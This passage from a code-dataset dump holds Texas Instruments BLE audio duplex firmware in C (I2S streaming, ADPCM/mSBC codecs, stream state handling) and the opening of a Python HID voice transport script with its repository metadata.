(I2SCC26XX_Handle)&(I2SCC26XX_config);\n I2SCC26XX_init(i2sHandle);\n\n // Initialize TLV320AIC3254 Codec on Audio BP\n status = AudioCodecOpen();\n if( AUDIO_CODEC_STATUS_SUCCESS != status)\n {\n Display_print0(hDisp, 4, 0, \"Fail: Can't open codec\");\n }\n // Configure Codec\n status = AudioCodecConfig(AUDIO_CODEC_TI_3254, AUDIO_CODEC_16_BIT,\n AUDIO_DUPLEX_SAMPLE_RATE, AUDIO_DUPLEX_NUM_CHAN,\n AUDIO_DUPLEX_OUTPUT_OPTION,\n AUDIO_DUPLEX_INPUT_OPTION);\n if( AUDIO_CODEC_STATUS_SUCCESS != status)\n {\n Display_print0(hDisp, 4, 0, \"Fail: Can't configure BP\");\n }\n\n // Add the Audio service\n status = Audio_AddService();\n\n if(SUCCESS != status)\n {\n Display_print0(hDisp, 4, 0, \"Fail: Can't add Audio Service\");\n }\n\n return (status);\n}\n\n/*********************************************************************\n * @fn AudioDuplex_close\n *\n * @brief Closes hardware, stops streaming\n *\n * @param None.\n *\n * @return None.\n */\nvoid AudioDuplex_close(void)\n{\n // Close the interface to the hardware codec\n AudioCodecClose();\n\n // Reset stream vars\n streamVariables.streamState = AudioDuplex_stream_idle;\n streamVariables.requestedStreamState = AudioDuplex_stream_idle;\n streamVariables.streamType = AUDIO_DUPLEX_STREAM_TYPE_NONE;\n streamVariables.requestedStreamType = AUDIO_DUPLEX_STREAM_TYPE_NONE;\n streamVariables.samplesPerFrame = 0;\n streamVariables.notificationsPerFrame = 0;\n streamVariables.numOfFramesToBuffer = I2SCC26XX_QUEUE_SIZE;\n streamVariables.rfFrameSize = BLEAUDIO_MAX_NOTSIZE;\n streamVariables.si = 0; // si;\n streamVariables.pv = 0; // pv;\n streamVariables.si_rx = 0; // si_rx;\n streamVariables.pv_rx = 0; // pv_rx;\n streamVariables.maxVolume = AUDIO_DUPLEX_MAX_VOLUME; // maxVolume;\n}\n\n/*********************************************************************\n * @fn AudioDuplex_setConnectionHandle\n *\n * @brief Set the connection handle of audio streaming\n *\n * @param connectionHandle - Connection handle.\n *\n * @return None\n */\nvoid AudioDuplex_setConnectionHandle(uint16_t connectionHandle)\n{\n audioConnectionHandle = connectionHandle;\n}\n\n/*********************************************************************\n * @fn AudioDuplex_getConnectionHandle\n *\n * @brief Get the connection handle of audio streaming\n *\n * @return connectionHandle- the handle used to stream\n */\nuint16_t AudioDuplex_getConnectionHandle(void)\n{\n return (audioConnectionHandle);\n}\n\n/*********************************************************************\n * @fn AudioDuplex_eventHandler\n *\n * @brief Processes Events called from I2S or BLE-Stack callbacks\n *\n * @param events - Events to process.\n *\n * @return None\n */\nvoid AudioDuplex_eventHandler(uint8_t events)\n{\n // Read in samples from I2S driver and encode\n if (events & AUDIO_DUPLEX_I2S_FRAME_EVENT)\n {\n if (i2sStreamInProgress)\n {\n I2SCC26XX_BufferRequest bufferRequest;\n I2SCC26XX_BufferRelease bufferRelease;\n bufferRequest.buffersRequested = I2SCC26XX_BUFFER_IN;\n // Indicate that we request buffer from input stream\n bool gotBuffer = I2SCC26XX_requestBuffer(i2sHandle, &bufferRequest);\n while (gotBuffer)\n {\n uint8_t *inBuffer = (uint8_t *)bufferRequest.bufferIn;\n uint8_t *bufHead = inBuffer;\n uint8_t si_local = streamVariables.si;\n uint16_t pv_local = streamVariables.pv;\n\n if (streamVariables.streamType == AUDIO_DUPLEX_STREAM_TYPE_MSBC)\n {\n sbc_encode(&sbc, (int16_t *)bufferRequest.bufferIn,\n streamVariables.samplesPerFrame * sizeof(int16_t),\n inBuffer,\n AUDIO_DUPLEX_MSBC_ENCODED_SIZE, 
&written);\n\n                    // Shift the buffer to account for the seqNum hdr\n                    AudioDuplex_shiftEncodedBuffer(inBuffer,\n                                                   BLEAUDIO_MAX_NOTSIZE,\n                                                   AUDIO_DUPLEX_STREAM_TYPE_MSBC);\n                    inBuffer[1] = seqNum++;\n                }\n                else\n                {\n                    Codec1_encodeBuff(inBuffer,\n                                      (int16_t *)bufferRequest.bufferIn,\n                                      streamVariables.samplesPerFrame,\n                                      &streamVariables.si, &streamVariables.pv);\n\n                    // Reset the pointer\n                    inBuffer = bufHead;\n                    bufferRequest.bufferIn = bufHead;\n\n                    // Shift the buffer to account for the seqNum hdr\n                    AudioDuplex_shiftEncodedBuffer(inBuffer,\n                                                   BLEAUDIO_MAX_NOTSIZE,\n                                                   AUDIO_DUPLEX_STREAM_TYPE_ADPCM);\n\n                    inBuffer[0] = seqNum++;\n                    // Send previous PV and SI\n                    inBuffer[1] = si_local;\n                    inBuffer[2] = LO_UINT16(pv_local);\n                    inBuffer[3] = HI_UINT16(pv_local);\n                }\n\n                AudioDuplex_transmitAudioFrame(inBuffer);\n\n                // Release the buffer back to the I2S driver\n                bufferRelease.bufferHandleIn = bufferRequest.bufferHandleIn;\n                bufferRelease.bufferHandleOut = NULL;\n                I2SCC26XX_releaseBuffer(i2sHandle, &bufferRelease);\n\n                // Request the next buffer from I2S driver\n                bufferRequest.buffersRequested = I2SCC26XX_BUFFER_IN;\n                // Indicate that we request buffer from input stream\n                gotBuffer = I2SCC26XX_requestBuffer(i2sHandle, &bufferRequest);\n            }\n        }\n    }\n\n    // Set the state vars to cleanup I2S streaming\n    if (events & AUDIO_DUPLEX_STOP_I2S_EVENT)\n    {\n        AudioDuplex_stopI2Sstream();\n    }\n\n    // Send stop command, cleanup stream\n    if (events & AUDIO_DUPLEX_SEND_STOP_CMD_EVENT)\n    {\n        AudioDuplex_sendStopCmd();\n    }\n\n    // Startup I2S sampling\n    if (events & AUDIO_DUPLEX_START_I2S_EVENT)\n    {\n        AudioDuplex_startI2Sstream();\n    }\n\n    // Startup BLE Streaming\n    if (events & AUDIO_DUPLEX_SEND_START_CMD_EVENT)\n    {\n        AudioDuplex_sendStartCmd();\n    }\n\n    // Handle error events from I2S driver\n    if (events & AUDIO_DUPLEX_I2S_ERROR_EVENT)\n    {\n        Display_print0(hDisp, 4, 0, \"I2S Error Event\");\n\n        // Move to stop state\n        uint_least16_t hwiKey = Hwi_disable();\n        streamVariables.streamState = AudioDuplex_send_stop_cmd;\n        if(appAudioCB != NULL)\n        {\n            // Notify the Application of the event\n            (*appAudioCB)(AUDIO_DUPLEX_SEND_STOP_CMD_EVENT);\n        }\n        Hwi_restore(hwiKey);\n    }\n}\n\n/*********************************************************************\n * @fn      AudioDuplex_processData\n *\n * @brief   Process incoming audio data\n *\n * @return  None\n */\nvoid AudioDuplex_processData(AudioDuplex_dataType data_type,\n                             AudioDuplex_audioData *pMsg)\n{\n    static uint16_t prevSeqNum = 0xFFFF;\n    static int numberOfPackets = 0, lostPackets = 0;\n    static int msbcnumberOfPackets = 0, msbclostPackets = 0;\n\n    // Check to see if notification is from audio data or control char\n    if (data_type == AudioDuplex_data)\n    {\n        // If we have started the stream, collect frames into a buffer\n        if (streamVariables.streamType == AUDIO_DUPLEX_CMD_START)\n        {\n            // Check to see if a frame has been missed and report it\n            if (((prevSeqNum + 1) & 0x00FF) != pMsg->pValue[0])\n            {\n                uint16_t curSeqNum = pMsg->pValue[0];\n                uint8_t missedFrames = 0;\n                if (pMsg->pValue[0] > prevSeqNum)\n                {\n                    missedFrames = curSeqNum - prevSeqNum;\n                }\n                else\n                {\n                    missedFrames = (curSeqNum + 256) - prevSeqNum;\n                }\n\n                numberOfPackets += missedFrames;\n                lostPackets += missedFrames;\n                Display_print2(hDisp, 5, 0, \"Missing frame, PER %d/%d\",\n                               lostPackets, numberOfPackets);\n            }\n            else\n            {\n                numberOfPackets++;\n            }\n            prevSeqNum = pMsg->pValue[0];\n        }\n        else if (streamVariables.streamType == AUDIO_DUPLEX_CMD_START_MSBC)\n        {\n            // Check to see if a frame has been missed and report it\n            if (((prevSeqNum + 1) & 0x00FF) 
!= pMsg->pValue[1])\n            {\n                uint16_t curSeqNum = pMsg->pValue[1];\n                uint8_t missedFrames = 0;\n\n                if (pMsg->pValue[1] > prevSeqNum)\n                {\n                    missedFrames = curSeqNum - prevSeqNum;\n                }\n                else\n                {\n                    missedFrames = (curSeqNum + 256) - prevSeqNum;\n                }\n\n                msbcnumberOfPackets += missedFrames;\n                msbclostPackets += missedFrames;\n                Display_print4(hDisp, 5, 0, \"Missing frame, PER %d/%d (%d vs %d)\",\n                                msbclostPackets, msbcnumberOfPackets,\n                                pMsg->pValue[1],\n                                prevSeqNum);\n            }\n            else\n            {\n                msbcnumberOfPackets++;\n            }\n            prevSeqNum = pMsg->pValue[1];\n        }\n\n        // If we have received a complete frame OTA, decode it and send it to\n        // I2S for playback\n        if (i2sStreamInProgress)\n        {\n            I2SCC26XX_BufferRequest bufferRequest;\n            I2SCC26XX_BufferRelease bufferRelease;\n            bufferRequest.buffersRequested = I2SCC26XX_BUFFER_OUT;\n            // Indicate that we request buffer from output stream\n            bool gotBuffer = I2SCC26XX_requestBuffer(i2sHandle, &bufferRequest);\n            if (gotBuffer)\n            {\n                // Call codec specific decode fxns\n                if (streamVariables.streamType == AUDIO_DUPLEX_CMD_START_MSBC)\n                {\n                    sbc_decode(&sbc, pMsg->pValue, AUDIO_DUPLEX_MSBC_ENCODED_SIZE,\n                               (int16_t *)bufferRequest.bufferOut,\n                               streamVariables.samplesPerFrame * sizeof(int16_t),\n                               &written);\n                }\n                else\n                {\n                    streamVariables.pv_rx = BUILD_UINT16(pMsg->pValue[2],\n                                                         pMsg->pValue[3]);\n                    streamVariables.si_rx = pMsg->pValue[1];\n                    Codec1_decodeBuff((int16_t *)bufferRequest.bufferOut,\n                                      (uint8_t *)&pMsg->pValue[4],\n                                      streamVariables.samplesPerFrame * sizeof(int16_t),\n                                      &streamVariables.si_rx, &streamVariables.pv_rx);\n                }\n\n                // Send the buffer to the BoosterPack\n                bufferRelease.bufferHandleOut = bufferRequest.bufferHandleOut;\n                bufferRelease.bufferHandleIn = NULL;\n                I2SCC26XX_releaseBuffer(i2sHandle, &bufferRelease);\n            }\n        }\n    }\n    else if (data_type == AudioDuplex_start_stop)\n    {\n        // Audio/Voice commands are 1B in length\n        if(AUDIOPROFILE_CMD_LEN == pMsg->len)\n        {\n            // Dispatch on the received start/stop command\n            if(AUDIO_DUPLEX_CMD_START == *(pMsg->pValue))\n            {\n                if (streamVariables.streamType != AUDIO_DUPLEX_CMD_STOP)\n                {\n                    Display_print0(hDisp, 5, 0, \"Already started stream\");\n                }\n                else\n                {\n                    // We received a start command for ADPCM, start the stream\n                    AudioDuplex_startStreaming(AUDIO_DUPLEX_STREAM_TYPE_ADPCM);\n\n                    Display_print0(hDisp, 5, 0, \"ADPCM Stream\");\n                }\n            }\n            else if(AUDIO_DUPLEX_CMD_START_MSBC == *(pMsg->pValue))\n            {\n                if (streamVariables.streamType != AUDIO_DUPLEX_CMD_STOP)\n                {\n                    Display_print0(hDisp, 5, 0, \"Already started stream\");\n                }\n                else\n                {\n                    // We received a start command for MSBC, start the stream\n                    AudioDuplex_startStreaming(AUDIO_DUPLEX_STREAM_TYPE_MSBC);\n                    // Initialize encoder\n                    sbc_init_msbc(&sbc, 0);\n                    Display_print0(hDisp, 5, 0, \"mSBC Stream\");\n                }\n            }\n            else if(AUDIO_DUPLEX_CMD_STOP == *(pMsg->pValue))\n            {\n\n                if(streamVariables.streamType != AUDIO_DUPLEX_STREAM_TYPE_NONE)\n                {\n                    Display_print0(hDisp, 5, 0, \"Received Stop, sending stop\");\n                    prevSeqNum = 0xFFFF;\n                    AudioDuplex_stopStreaming();\n                }\n                else\n                {\n                    Display_print0(hDisp, 5, 0, \"Received Stop, re-starting\");\n                    prevSeqNum = 0xFFFF;\n                    AudioDuplex_startStreaming(streamVariables.requestedStreamType);\n                }\n            }\n        }\n    }\n}\n\n/*********************************************************************\n * @fn      AudioDuplex_startStreaming\n *\n * @brief   Starts streaming audio to connected device\n *\n * @param   requestedStreamType - The type of stream to start:\n *          - AUDIO_DUPLEX_STREAM_TYPE_ADPCM\n *          - AUDIO_DUPLEX_STREAM_TYPE_MSBC\n *\n * @return  None.\n */\nvoid 
AudioDuplex_startStreaming(uint8_t requestedStreamType)\n{\n    // Do stream state logic\n    if (streamVariables.streamState == AudioDuplex_stream_idle)\n    {\n        // Start stream, from IDLE\n        streamVariables.streamType = requestedStreamType;\n\n        if(requestedStreamType == AUDIO_DUPLEX_STREAM_TYPE_MSBC)\n        {\n            streamVariables.samplesPerFrame = AUDIO_DUPLEX_MSBC_SAMPLES_PER_FRAME;\n            streamVariables.notificationsPerFrame = BLEAUDIO_NUM_NOT_PER_FRAME_MSBC;\n            streamVariables.requestedStreamType = AUDIO_DUPLEX_STREAM_TYPE_MSBC;\n        }\n        else\n        {\n            streamVariables.samplesPerFrame = AUDIO_DUPLEX_ADPCM_SAMPLES_PER_FRAME;\n            streamVariables.notificationsPerFrame = BLEAUDIO_NUM_NOT_PER_FRAME_ADPCM;\n            streamVariables.requestedStreamType = AUDIO_DUPLEX_STREAM_TYPE_ADPCM;\n        }\n\n        streamVariables.numOfFramesToBuffer = I2SCC26XX_QUEUE_SIZE;\n        streamVariables.rfFrameSize = BLEAUDIO_MAX_NOTSIZE;\n        Audio_SetAudioDataLen(streamVariables.rfFrameSize);\n\n        streamVariables.requestedStreamState = AudioDuplex_stream_active;\n    }\n    else if(streamVariables.streamType != requestedStreamType &&\n            requestedStreamType != AudioDuplex_stream_idle)\n    {\n        AudioDuplex_stopStreaming();\n\n        // Start stream, from IDLE\n        streamVariables.requestedStreamType = requestedStreamType;\n        return;\n    }\n    else\n    {\n        // Stop stream\n        streamVariables.requestedStreamType = AUDIO_DUPLEX_STREAM_TYPE_NONE;\n        streamVariables.requestedStreamState = AudioDuplex_stream_idle;\n        // Start chain of events to stop stream\n        AudioDuplex_stopStreaming();\n        return;\n    }\n\n    // Increase TX power during stream\n    HCI_EXT_SetTxPowerCmd(HCI_EXT_TX_POWER_5_DBM);\n\n    i2sHandle = AudioDuplex_openI2S();\n\n    if (i2sHandle != NULL)\n    {\n        Display_print1(hDisp, 5, 0, \"Opened I2S: %d samples/frame\",\n                       streamVariables.samplesPerFrame);\n        // Move to send start command\n        streamVariables.streamState = AudioDuplex_send_start_cmd;\n        if(appAudioCB != NULL)\n        {\n            // Notify the Application of the event\n            (*appAudioCB)(AUDIO_DUPLEX_SEND_START_CMD_EVENT);\n        }\n    }\n    else\n    {\n        Display_print0(hDisp, 5, 0, \"Failed to open I2S\");\n        // Return, or move to IDLE state\n        streamVariables.streamState = AudioDuplex_stream_idle;\n    }\n}\n\n/*********************************************************************\n * @fn      AudioDuplex_stopStreaming\n *\n * @brief   Close and cleanup audio stream\n *\n * @param   None.\n *\n * @return  None.\n */\nvoid AudioDuplex_stopStreaming(void)\n{\n    streamVariables.requestedStreamState = AudioDuplex_send_stop_cmd;\n    streamVariables.streamState = AudioDuplex_send_stop_cmd;\n    // Start chain of events to stop stream\n    AudioDuplex_sendStopCmd();\n\n    // Turn output volume back down\n    volume = 0;\n    AudioCodecSpeakerVolCtrl(AUDIO_CODEC_TI_3254, AUDIO_DUPLEX_OUTPUT_OPTION, volume);\n    // Turn input volume down as well\n    AudioCodecMicVolCtrl(AUDIO_CODEC_TI_3254, AUDIO_DUPLEX_INPUT_OPTION, volume);\n\n    if (streamVariables.streamType == AUDIO_DUPLEX_CMD_START_MSBC)\n    {\n        sbc_finish(&sbc);\n    }\n\n    if (i2sHandle != NULL)\n    {\n        I2SCC26XX_close(i2sHandle);\n        Display_print0(hDisp, 5, 0, \"Closed I2S driver\");\n\n        if (audio_decoded)\n        {\n            audio_decoded = NULL;\n            Display_print0(hDisp, 5, 0, \"Freed memory for I2S driver\");\n        }\n        else\n        {\n            Display_print0(hDisp, 5, 0, \"Failed to free memory for I2S driver\");\n        }\n        if (i2sContMgtBuffer)\n        {\n            i2sContMgtBuffer = NULL;\n        }\n\n        // Re-enable the instruction cache\n        AudioDuplex_enableCache();\n    }\n\n    streamVariables.streamType = AUDIO_DUPLEX_CMD_STOP;\n    streamVariables.streamState = 
AudioDuplex_stream_idle;\n Display_print0(hDisp, 5, 0, \"No Stream\");\n}\n\n/*********************************************************************\n * @fn AudioDuplex_sendStartCmd\n *\n * @brief Sends a start command to connected device\n *\n * @param None.\n *\n * @return None.\n */\nstatic void AudioDuplex_sendStartCmd(void)\n{\n // Check that we're in the correct state\n if (streamVariables.streamState == AudioDuplex_send_start_cmd)\n {\n uint8_t startCmd = streamVariables.streamType;\n uint8_t retVal = Audio_SetParameter(AUDIOPROFILE_START,\n AUDIOPROFILE_CMD_LEN,\n &startCmd);\n if (retVal == SUCCESS)\n {\n Display_print0(hDisp, 5, 0, \"Sent Start Cmd, initializing encoder\");\n if (streamVariables.streamType == AUDIO_DUPLEX_STREAM_TYPE_MSBC)\n {\n // Initialize encoder\n sbc_init_msbc(&sbc, 0);\n }\n else\n {\n // Initialize encoder\n streamVariables.pv = 0;\n streamVariables.si = 0;\n }\n // Try next state\n streamVariables.streamState = AudioDuplex_start_I2S;\n if(appAudioCB != NULL)\n {\n // Notify the Application of the event\n (*appAudioCB)(AUDIO_DUPLEX_START_I2S_EVENT);\n }\n }\n else\n {\n if(appAudioCB != NULL)\n {\n // Notify the Application of the event\n (*appAudioCB)(AUDIO_DUPLEX_SEND_START_CMD_EVENT);\n }\n }\n }\n else\n {\n if(appAudioCB != NULL)\n {\n // Notify the Application of the event\n (*appAudioCB)(AUDIO_DUPLEX_START_I2S_EVENT);\n }\n }\n\n}\n\n/*********************************************************************\n * @fn AudioDuplex_sendStopCmd\n *\n * @brief Sends a stop command to connected device\n *\n * @param None.\n *\n * @return None.\n */\nstatic void AudioDuplex_sendStopCmd(void)\n{\n // Check that we're in the correct state\n if (streamVariables.streamState == AudioDuplex_send_stop_cmd)\n {\n uint8_t retVal = SUCCESS;\n\n if (linkDB_Up(audioConnectionHandle))\n {\n uint8_t stopCmd = AUDIO_DUPLEX_CMD_STOP;\n retVal = Audio_SetParameter(AUDIOPROFILE_START, AUDIOPROFILE_CMD_LEN,\n &stopCmd);\n if (retVal == SUCCESS)\n {\n // Reset TX power\n // Move to stop I2S stream\n HCI_EXT_SetTxPowerCmd(HCI_EXT_TX_POWER_0_DBM);\n streamVariables.streamState = AudioDuplex_stop_I2S;\n AudioDuplex_stopI2Sstream();\n }\n else\n {\n Display_print1(hDisp, 5, 0, \"Failed to send STOP: %d\", retVal);\n // Try again\n if(appAudioCB != NULL)\n {\n // Notify the Application of the event\n (*appAudioCB)(AUDIO_DUPLEX_SEND_STOP_CMD_EVENT);\n }\n }\n }\n else\n {\n // Reset TX power\n HCI_EXT_SetTxPowerCmd(HCI_EXT_TX_POWER_0_DBM);\n // Move to stop I2S stream\n streamVariables.streamState = AudioDuplex_stop_I2S;\n if(appAudioCB != NULL)\n {\n // Notify the Application of the event\n (*appAudioCB)(AUDIO_DUPLEX_STOP_I2S_EVENT);\n }\n }\n }\n else\n {\n // Try next state\n if(appAudioCB != NULL)\n {\n // Notify the Application of the event\n (*appAudioCB)(AUDIO_DUPLEX_STOP_I2S_EVENT);\n }\n }\n}\n\n/*********************************************************************\n * @fn AudioDuplex_startI2Sstream\n *\n * @brief Start I2S stream\n *\n * @param None.\n *\n * @return None.\n */\nstatic void AudioDuplex_startI2Sstream(void)\n{\n // Check that we're in the correct state\n if (streamVariables.streamState == AudioDuplex_start_I2S)\n {\n if (streamVariables.requestedStreamState == AudioDuplex_stream_active)\n {\n // It's now safe to update audio data length\n Audio_SetAudioDataLen(streamVariables.rfFrameSize);\n // Try to start I2S stream\n i2sStreamInProgress = I2SCC26XX_startStream(i2sHandle);\n if (i2sStreamInProgress)\n {\n // Move to ACTIVE as we have completed start sequence\n 
streamVariables.streamState = AudioDuplex_stream_active;\n\n if (streamVariables.streamType == AUDIO_DUPLEX_STREAM_TYPE_MSBC)\n {\n Display_print0(hDisp, 5, 0, \"mSBC Stream Started\");\n }\n else if (streamVariables.streamType == AUDIO_DUPLEX_STREAM_TYPE_ADPCM)\n {\n Display_print0(hDisp, 5, 0, \"ADPCM Stream Started\");\n }\n }\n else\n {\n Display_print0(hDisp, 5, 0, \"Failed to start I2S stream\");\n }\n }\n else\n {\n Display_print0(hDisp, 5, 0, \"Started stream when Active was not requested\");\n }\n }\n}\n\n/*********************************************************************\n * @fn AudioDuplex_stopI2Sstream\n *\n * @brief Stop I2S stream\n *\n * @param None.\n *\n * @return None.\n */\nstatic void AudioDuplex_stopI2Sstream(void)\n{\n // Check that we're in the correct state\n if (streamVariables.streamState == AudioDuplex_stop_I2S)\n {\n // Try to stop I2S stream\n if (I2SCC26XX_stopStream(i2sHandle))\n {\n Display_print0(hDisp, 5, 0, \"Stopped I2S stream\");\n i2sStreamInProgress = false;\n }\n else\n {\n Display_print0(hDisp, 5, 0, \"Failed to stop I2S stream\");\n }\n }\n else\n {\n Display_print1(hDisp, 5, 0, \"Tried to stop I2S stream in state %d\",\n streamVariables.streamState);\n }\n}\n\nstatic I2SCC26XX_Handle AudioDuplex_openI2S(void)\n{\n I2SCC26XX_Handle i2sHandleTmp = NULL;\n // Allocate memory for decoded PCM data\n i2sParams.ui32conMgtBufTotalSize = I2S_BLOCK_OVERHEAD_IN_BYTES * \\\n streamVariables.numOfFramesToBuffer\\\n * 2;\n\n i2sParams.ui32conBufTotalSize = sizeof(int16_t) * (streamVariables.samplesPerFrame * \\\n streamVariables.numOfFramesToBuffer \\\n * 2);\n\n // Disable instruction cache to use for audio buffers\n AudioDuplex_disableCache();\n i2sContMgtBuffer = (uint8_t *)(I2S_MEM_BASE + I2S_BUF + 1);\n audio_decoded = (int16_t *)I2S_MEM_BASE;\n\n if (audio_decoded)\n {\n // Setup I2S Params\n i2sParams.blockSize = streamVariables.samplesPerFrame;\n i2sParams.pvContBuffer = (void *) audio_decoded;\n i2sParams.pvContMgtBuffer = (void *) i2sContMgtBuffer;\n\n // Reset I2S handle and attempt to open\n i2sHandle = (I2SCC26XX_Handle)&(I2SCC26XX_config);\n i2sHandleTmp = I2SCC26XX_open(i2sHandle, &i2sParams);\n\n volume = streamVariables.maxVolume;\n }\n else\n {\n Display_print0(hDisp, 5, 0, \"Failed to allocate mem for I2S\");\n if (i2sContMgtBuffer)\n {\n i2sContMgtBuffer = NULL;\n }\n }\n\n AudioCodecSpeakerVolCtrl(AUDIO_CODEC_TI_3254, AUDIO_DUPLEX_OUTPUT_OPTION, volume);\n // Volume control\n AudioCodecMicVolCtrl(AUDIO_CODEC_TI_3254, AUDIO_DUPLEX_INPUT_OPTION, volume);\n\n return (i2sHandleTmp);\n}\n\n/*********************************************************************\n * @fn AudioDuplex_transmitAudioFrame\n *\n * @brief Transmits processed audio frame to connected device\n *\n * @param buf - pointer to PDM buffer\n *\n * @return None.\n */\nstatic bStatus_t AudioDuplex_transmitAudioFrame(uint8_t *buf)\n{\n bStatus_t notiStatus = SUCCESS;\n if(linkDB_Up(audioConnectionHandle))\n {\n // Send streamVariables.notificationsPerFrame GATT notifications for every audio frame\n for (int i = 0; i < streamVariables.notificationsPerFrame; )\n {\n notiStatus = Audio_SetParameter(AUDIOPROFILE_AUDIO, streamVariables.rfFrameSize, buf);\n if (notiStatus == SUCCESS)\n {\n // Move on to next section of audio frame\n buf += streamVariables.rfFrameSize;\n i++;\n }\n else\n {\n // Return the error immediately\n return(notiStatus);\n }\n }\n\n }\n else\n {\n notiStatus = FAILURE;\n }\n\n 
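// Surface the aggregate notification status (SUCCESS or first failure) to the caller\n    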
return(notiStatus);\n}\n\n/*********************************************************************\n * @fn      AudioDuplex_shiftEncodedBuffer\n *\n * @brief   Shifts an encoded buffer to include headers for RF\n *          This is used to prevent double copying\n *\n * @param   encodedBuf - The encoded buffer for copying\n * @param   len - length of input buffer\n * @param   streamType - Type of stream, determines how much to shift\n *\n * @return  None.\n */\nstatic void AudioDuplex_shiftEncodedBuffer(uint8_t *encodedBuf, uint8_t len,\n                                           uint8_t streamType)\n{\n    uint8_t hdrSize = 0;\n\n    if(streamType == AUDIO_DUPLEX_STREAM_TYPE_ADPCM)\n    {\n        hdrSize = AUDIO_DUPLEX_HDRSIZE_ADPCM;\n    }\n    else if (streamType == AUDIO_DUPLEX_STREAM_TYPE_MSBC)\n    {\n        hdrSize = AUDIO_DUPLEX_HDRSIZE_MSBC;\n    }\n    else\n    {\n        // Assume unencoded buffer, return\n        return;\n    }\n\n    // Shift the buffer based on stream type\n    for( int16_t index = ( len - 1 ) ; index >= hdrSize ; index-- )\n    {\n        encodedBuf[index] = encodedBuf[index - hdrSize];\n    }\n}\n\n/*********************************************************************\n * @fn      AudioDuplex_disableCache\n *\n * @brief   Disables the instruction cache and sets power constraints\n *          This prevents the device from sleeping while streaming\n *\n * @param   None.\n *\n * @return  None.\n */\nstatic void AudioDuplex_disableCache()\n{\n    uint_least16_t hwiKey = Hwi_disable();\n    Power_setConstraint(PowerCC26XX_SB_VIMS_CACHE_RETAIN);\n    Power_setConstraint(PowerCC26XX_NEED_FLASH_IN_IDLE);\n    VIMSModeSafeSet(VIMS_BASE, VIMS_MODE_DISABLED, true);\n    Hwi_restore(hwiKey);\n}\n\n/*********************************************************************\n * @fn      AudioDuplex_enableCache\n *\n * @brief   Enables the instruction cache and releases power constraints\n *          Allows device to sleep again\n *\n * @param   None.\n *\n * @return  None.\n */\nstatic void AudioDuplex_enableCache()\n{\n    uint_least16_t hwiKey = Hwi_disable();\n    Power_releaseConstraint(PowerCC26XX_SB_VIMS_CACHE_RETAIN);\n    Power_releaseConstraint(PowerCC26XX_NEED_FLASH_IN_IDLE);\n    VIMSModeSafeSet(VIMS_BASE, VIMS_MODE_ENABLED, true);\n    Hwi_restore(hwiKey);\n}\n\n/*********************************************************************\n * @fn      AudioDuplex_i2sCallbackFxn\n *\n * @brief   Callback function from I2S driver, sets events to be\n *          processed in the task context\n *\n * @param   None.\n *\n * @return  None.\n */\nstatic void AudioDuplex_i2sCallbackFxn(I2SCC26XX_Handle handle,\n                                       I2SCC26XX_StreamNotification *notification)\n{\n    if (notification->status == I2SCC26XX_STREAM_ERROR)\n    {\n        if(appAudioCB != NULL)\n        {\n            // Notify the Application of the event\n            (*appAudioCB)(AUDIO_DUPLEX_I2S_ERROR_EVENT);\n        }\n    }\n    else if (notification->status == I2SCC26XX_STREAM_BUFFER_READY)\n    {\n        if(appAudioCB != NULL)\n        {\n            // Notify the Application of the event\n            (*appAudioCB)(AUDIO_DUPLEX_I2S_FRAME_EVENT);\n        }\n    }\n    else if (notification->status == I2SCC26XX_STREAM_BUFFER_READY_BUT_NO_AVAILABLE_BUFFERS)\n    {\n        if(appAudioCB != NULL)\n        {\n            // Notify the Application of the event\n            (*appAudioCB)(AUDIO_DUPLEX_I2S_FRAME_EVENT);\n        }\n    }\n}\n\n/*********************************************************************\n*********************************************************************/\n"
},
{
"alpha_fraction": 0.5150375962257385,
"alphanum_fraction": 0.5355601906776428,
"avg_line_length": 36.3870964050293,
"blob_id": "83c1ac238192ec948aa6bdccc46f56e0684e59ca",
"content_id": "1bfe12b497dbef5d077b31decf548c43f1183687",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16226,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 434,
"path": "/tools/scripts/voice/transport/hidtransport.py",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "\"\"\"\n/*\n * Filename: hidlegacy.py\n *\n * Description: Voice over HID over GATT with the legacy HID service\n *\n * Copyright (C) 2017 Texas Instruments Incorporated - http://www.ti.com/\n *\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the\n * distribution.\n *\n * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n */\n\"\"\"\n\nfrom .transport import TransportBase\nimport logging\nimport pywinusb.hid as hid\nfrom struct import pack\nfrom time import sleep\nimport time\n\n\nclass HIDTransport(object):\n\n \"\"\"\n This set must be overridden by any derived classes!!\n This set should contain a list of all report_ids for which required for the voice HID reports\n \"\"\"\n _VENDOR_IDS = set([])\n\n def __init__(self, callback, vendor_id=None, product_id=None):\n self.logger = logging.getLogger(self.__class__.__name__)\n self.logger.info(\"Init\")\n\n \"\"\" Designate all instance variables \"\"\"\n self.product_id = None\n self.vendor_id = None\n self.hid_device = None\n\n \"\"\" Apply values as defined by the instance \"\"\"\n self.__hid_callbackFxn = 